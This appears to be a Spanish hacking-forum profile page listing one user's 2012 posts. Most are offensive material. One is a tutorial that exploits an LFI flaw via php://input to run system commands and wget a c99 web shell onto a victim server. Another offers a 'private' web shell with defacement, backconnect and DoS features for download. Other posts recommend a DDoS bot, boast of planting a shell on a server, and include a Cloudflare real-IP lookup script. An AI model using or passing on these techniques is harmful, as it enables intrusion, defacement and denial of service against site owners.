Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CalebBucker

Páginas 1 ... 3 4 5 6 7 8

#81

Dudas y pedidos generales / Re:Trazar email

Julio 25, 2012, 11:43:07 PM

Hola,
Podes obtener la IP de la persona que te envia el mensaje a tu bandeja de correo, solo basta con ingresar al cuerpo del mensaje y seleccionar la opcion "Ver codigo fuente del mensaje"

Y luego en el code html, buscas esta linea:
Received: from [IP] (port= helo=IP)

Coges la IP y le haces un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos.

#82

Cursos, manuales y libros / Re:Guía para SQLi (MySQL, MSSQL & ORACLE)

Julio 25, 2012, 05:01:55 PM

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#83

Pentesting / Sensitive Buster v1.0 - r00tw0rm Coders

Julio 18, 2012, 11:28:12 PM

El equipo de r00tw0rm acaba de lanzar hoy una nueva herramienta, llamada "Sensitive Buster" codeada por Th3breachery Angel Injection.

La herramienta encuentra las vulnerabilidades en los servidores web como tambien Paneles de Administración, Archivos y Carpetas confidenciales, Shells e incluso Copias de Seguridad (backup).

La herramienta esta codeada en Python y es de código abierto para que todo el mundo pueda editarlo.

Uso:

* Instalar y Activar Python
* Abrir la consola/terminal
* Teclear ./sensitivebuster.py

Modos:

* -shell
* -backup
* -dir
* -admin
* -files

Ejemplo:

python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -m files

Utilizar la Herramienta con Proxy:

python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -m files -p 127.0.0.1:8080

Descargar Sensitive Buster: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Password : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

VideoTutorial:

Fuente: TheHackerNews - Traduced By Me

#84

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 17, 2012, 11:07:59 PM

Cita de: [Corruptedyte link=topic=10344.msg37277#msg37277 date=1342573176]
Código: text
Si no te gusta, no la uses.
WTF? HAHAHAHA
Fue una simple pregunta sin ánimos de ofenderte, mejor dime que no sabes en vez de contestar de esa manera tan ridícula e infantil.

Tu comentario es con animo de ofender, aunque vos digas que NO ! & si no te gusta la Tool no la uses asi de simple.
WpScan: Solo funciona el enumerate & plugins.
No podes decir que "que tiene esta tool que no tenga la otra" es LÓGICO que todas las herramientas no tienen el mismo funcionamiento.

#85

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 17, 2012, 02:28:37 PM

Cita de: [Corruptedyte link=topic=10344.msg37243#msg37243 date=1342543621]
Que tiene este que no tenga wpscan?

Si no te gusta, no la uses.

#86

Pentesting / PwnieExpress - Pentesting en Nokia N900

Julio 15, 2012, 03:05:17 PM

PwnPhone
Un Nokia N900 basado en la plataforma Pentesting.

PwnieExpress una de la mejor suite de Pentesting para el Nokia N900. Incluye Aircrack, Metasploit, Kismet, GrimWEPa, SET, FastTrack, Ettercap, Nmap y mucho más.

La pantalla es totalmente personalizada para el Pentesting con accesos directos a Macchanger, incorporado en la tarjeta inalámbrica compatible con la inyección de paquetes, el modo monitor y el modo promiscuo también está disponible.

Principal Pantalla del Escritorio:

Código: text

1. Conky - Para ver el uso del sistema y stats
2. Promiscuous_on_off - Script para activar el modo promiscuo de manera intermitente durante wlan0
3. xterm RootShell - el acceso de root shell en el directorio /home/usuario/MyDocs/pwnphone
4. Macchanger - Rolls dirección MAC de la tarjeta inalámbrica wlan0 y los cambios de nombre de host a "DellPC"
5. Nmap - Versión de línea de Comando de Nmap
6. Zenmap - Versión GUI de Nmap
7. InjectionON - Carga los controladores necesarios para la inyección de paquetes inalámbrico
8. InjectionOFF - Descarga los controladores de la inyección de paquetes y vuelve a cargar los controladores normales wifi
9. Airodump-ng - Rápido acceso a la tecnología inalámbrica sniffer, ejecutando: airodump-ng wlan0
10. Kismet - Wireless Sniffer / herramienta de mapeo
11. Wifite - Herramienta de ataque Wirelles automatizado
12. Wifizoo - Herramienta inalámbrica para olfatear las sesiones activas en el wifi
13. Grimwepa - Hherramienta en GUI que se utilizan con la suite aircrack-ng - WEP / WPA cracking
14. Wepbuster - Automáticamente rompe las redes inalámbricas de WEP en el rango (¡cuidado!)
15. El modo promiscuo en el botón de off - Activa el modo promiscuo en wlan0
16. Wireshark - acceso directo del escritorio - analizador de paquetes / sniffer
17. Tshark - La versión CMD línea de Wireshark - Se ejecuta en wlan0
18. Tcpdump - Ejecutar tcpdump en wlan0 (tcpdump-s0-n-i wlan0)
19. Sslstrip - Herramienta utilizada para despojar a los sitios web de SSL y oler las credenciales
20. Scapy - Interfaz Scapy - la manipulación de paquetes interactivos
21. Nikto - Herramienta Web de exploración de vulnerabilidades
22. SET - Kit de herramientas de Ingeniería Social
23. Metasploit - la versión del CMD msf3 (msfconsole)
24. Metasploit-GUI - versión GUI de msf3
25. Fasttrack - Herramienta automatizada pentesting
26. EttercapNG-Curses - Version Curses de EttercapNG
27. EttercapNG-GUI - versión GUI de EttercapNG

Algunas Imagenes de las Herramientas:

Para poder obtener todas estas aplicaciones en nuestro Nokia N900, tenemos que ingresar a la pagina oficial del proyecto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y comprar dicho archivo, la cual el precio es de $960.00 USD

Pero si ya tenes el Nokia N900 en tus manos, te facilitare las aplicaciones totalmente gratis !! solo tenes que dirigirte a este link para descargar la aplicación:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (430 MB)

Extraes el archivo tar.gz y podrás ver una carpeta con el nombre "pwnimage" luego abres esa carpeta y habrá un archivo de instrucciones sobre "Como Instalar Pwnie Express" sigues todas las instrucciones y voila!! tendrás tu MÓVIL listo para realizar Pruebas de Penetración!

Acceso SHH:
Username: root
Password: pwnphone
Ruta: /home/user/MyDocs/pwnphone

Espero te guste...

Saludos.

#87

Bugs y Exploits / Subiendo Shell Explotando LFI via PHP:INPUT

Julio 14, 2012, 11:53:18 PM

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si el sitio web puede leer dicho código, la web quedaría asi:

Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar

Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login la cual quedaría asi:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:

Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>

Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

<? system ('wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'); ?>

Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt

Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>

Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php

Ahora, en este caso nos dirigimos a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y Voila tenemos nuestra shell!!

No Entendistes?

Observa el VideoTutorial en 1080p HD!

Espero te sirva y lo uses con prudencia.

Saludos.

#88

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 14, 2012, 07:14:56 PM

El "deface" es lammer... yo solo entre al servidor para dejar mi shell UDP.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#89

Bugs y Exploits / WordPress Security Fingerprinter Exploit-DB

Julio 12, 2012, 06:19:08 PM

Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

Código: text

root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com

En este caso yo he colocado, el link You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poner a prueba la herramienta, como se aprecia en la siguiente imagen:

Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.

Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.

#90

Hacking / Re:Metodos alternativos para Accesar a un servidor [Hacking For Dummies]

Julio 07, 2012, 06:40:28 PM

Yo siempre recurro al reverse y logro mi objetivo XD

#91

Hacking / Re:Interceptacion de Entregas y Paqueteria "Servientrega"

Julio 07, 2012, 06:01:23 PM

En todo el mundo pasa eso, porque a las entidades esa, solo les interesa el dinero.

#92

Dudas y pedidos generales / Re:¿ que me recomiendan ?

Julio 05, 2012, 10:45:20 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Quiero empezar a jugar con el tema de los botnets, crypters, etc. para aprender un poco para testearlos.
Quisiera saber cual bot me recomiendan para empezar, que sirva para todos los windows xp/vista/7 y tenga distintas funciones (ddos, keylog, etc.) Desde ya muchas gracias. Salu2 a toda la comunidad.

Si la queres para DDos usa la Darkness (Optima)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ahi incluye los archivos...

#93

Dudas y pedidos generales / Re:[Ayuda] Pixelear Video

Julio 04, 2012, 09:36:14 PM

Hola, ya lo ando haciendo... gracias por responder, les debo una

#94

Dudas y pedidos generales / Re:[Ayuda] Pixelear Video

Julio 04, 2012, 09:21:07 PM

Si, pero lo que pasa esque soy noob en Windows T_T

#95

Dudas y pedidos generales / [SOLUCIONADO] Pixelear Video

Julio 04, 2012, 07:49:12 PM

Hola que tal...

Bueno quisiera saber si alguien conoce la forma o un soft para pixelear un video.
Lo que pasa es que he realizado un video y dentro de ello se muestra algunos links e imagenes que quiero que se vean opacas o que simplemente no se vea.

Si alguien conoce o sabe como hacerlo, que responda por favor.

Gracias de antemano

#96

Bugs y Exploits / I-47 v1.3 Shell Private

Julio 04, 2012, 05:16:39 PM

Hola, esta vez voy a dejarles una Shell totalmente privada, la cual me la envió un amigo de Indian Hackers.

Las compartire con ustedes, esperando que le den buen uso, y no estén divulgando el enlace de este archivo en otros foros.

Características de la Shell:

- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look

Nuevas funciones:

- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs

Imágenes:

Descargar Shell en Ingles:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descargar Shell en Hindi (India)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Usuario: I-47
Password: I-47

Saludos...

#97

Bugs y Exploits / Re:Symlink con la tool

Julio 04, 2012, 04:09:01 PM

El You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login solo funciona con algunos cms y no es compatibles con todos...

#98

Bugs y Exploits / Re:Upload Shell PHBB Forum

Julio 04, 2012, 04:05:34 PM

Si, como no.

Shell b37ak
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

saludos.

#99

Hacking / Re:Obteniendo IP Real en Sitios Protegidos por CLOUDFLARE

Julio 03, 2012, 05:05:25 PM

Existen muchos metodos para obtener dichas ip, tambien con un simple You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sacas todo...

Dejare otro code en Python para obtener la IP Real

Código: text

# Cloudflare > real ip
# Coded by Dan
# Shoutouts to Mx. And Hax0r.

import socket

def getsite():
    global site
    site = raw_input("[!] Enter the URL: ")
    if site[:7] == "http://":
  site = site[7:]

getsite()

def getip():
    list = ["cpanel.","ftp.","mail.","webmail.","direct.","direct-connect.", "record."]
    print("[!] Trying to grab the real IP using different protocols.")
    for item in list:
  try:
     ip = socket.gethostbyname(item + site)
     print "[+] " + item + site +  ", " + ip + " found."
  except:
    print("[-] " + item + site + " not found.")

getip()

Saludos.

#100

Dudas y pedidos generales / Re:[Ayuda] Eliminar particiones de Linux en Windows 7

Julio 02, 2012, 11:49:13 PM

Es lo mismo, formatees en cualquier tipo igual tendrás los mismos resultados.

Páginas 1 ... 3 4 5 6 7 8